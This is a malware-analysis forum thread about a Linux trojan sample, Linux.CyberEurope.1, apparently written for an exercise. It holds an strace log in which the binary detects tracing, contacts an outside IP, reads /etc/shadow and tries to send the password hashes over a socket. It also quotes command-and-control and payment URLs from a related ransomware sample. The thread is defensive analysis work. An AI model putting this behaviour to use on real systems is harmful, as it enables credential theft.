Something new: https://www.virustotal.com/en/file/47de ... /analysis/
[drweb.com #7192274]: Added Linux.CyberEurope.1
[drweb.com #7192274]: Added Linux.CyberEurope.1
A forum for reverse engineering, OS internals and malware analysis
Sample :
Attachments
(1.37 MiB) Downloaded 94 times
it's not a malware that you'll find in-the-wild. Most likely it's generated for educational purposes.
FafZee wrote:Sample :What's the password of Linux.CyberEurope?
Thank you.
perlish wrote:infected is the default pass.FafZee wrote:Sample :What's the password of Linux.CyberEurope?
Thank you.
Ring0 - the source of inspiration
[root@i-0spjvlla bot]# strace -f ./47dedb0a5a40ff81d5d59f39f93bb5dd7ffebcc09b6d6247d30cef12ee7d8662
execve("./47dedb0a5a40ff81d5d59f39f93bb5dd7ffebcc09b6d6247d30cef12ee7d8662", ["./47dedb0a5a40ff81d5d59f39f93bb5"...], [/* 22 vars */]) = 0
uname({sys="Linux", node="i-0spjvlla", ...}) = 0
brk(0) = 0x20d3000
brk(0x20d41c0) = 0x20d41c0
arch_prctl(ARCH_SET_FS, 0x20d3880) = 0
readlink("/proc/self/exe", "/data/bot/47dedb0a5a40ff81d5d59f"..., 4096) = 74
brk(0x20f51c0) = 0x20f51c0
brk(0x20f6000) = 0x20f6000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
getppid() = 16804
open("/proc/16804/cmdline", O_RDONLY) = 3
read(3, "strace\0-f\0./47dedb0a5a40ff81d5d5", 32) = 32
close(3) = 0
getppid() = 16804
open("/proc/16804/status", O_RDONLY) = 3
read(3, "Name:\tstrace\nState:\tS (sleeping)", 32) = 32
close(3) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(179), sin_addr=inet_addr("198.216.87.22")}, 16) = -1 ETIMEDOUT (Connection timed out)
open("/etc/shadow", O_RDONLY) = 4
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 5
connect(5, {sa_family=AF_INET, sin_port=htons(2222), sin_addr=inet_addr("127.127.127.127")}, 16) = -1 ECONNREFUSED (Connection refused)
read(4, "root:$6$3IDK7UQk$4qP6R5nocX2DVpL"..., 1024) = 678
write(5, "root:$6$3IDK7UQk$4qP6R5nocX2DVpL"..., 678) = -1 EPIPE (Broken pipe)
--- SIGPIPE {si_signo=SIGPIPE, si_code=SI_USER, si_pid=16809, si_uid=0} ---
+++ killed by SIGPIPE +++
A detailed description could be found here: http://vms.drweb.com/virus/?_is=1&i=8598627
tWiCe wrote:A detailed description could be found here: http://vms.drweb.com/virus/?_is=1&i=8598627
Code: Select all
That's interesting, because Linux.Encoder.6/HEUR:Trojan-Ransom.Linux.Arttec.a (SHA1: e460b9fffd9218db1191e07eca2197d83aec64cc) sample has the similar strings:
A Trojan for Linux operating systems. Its code appears to have been written for research purposes as part of the https://cyber-europe.net project.Code: Select all
:~> strings ~/111/e460b9fffd9218db1191e07eca2197d83aec64cc | grep 'cyber-europe.net'
http://www.cyber-europe.net/evl/grab/xx/get.php
Please visit http://www.cyber-europe.net/evl/anon/pay/transaction.php
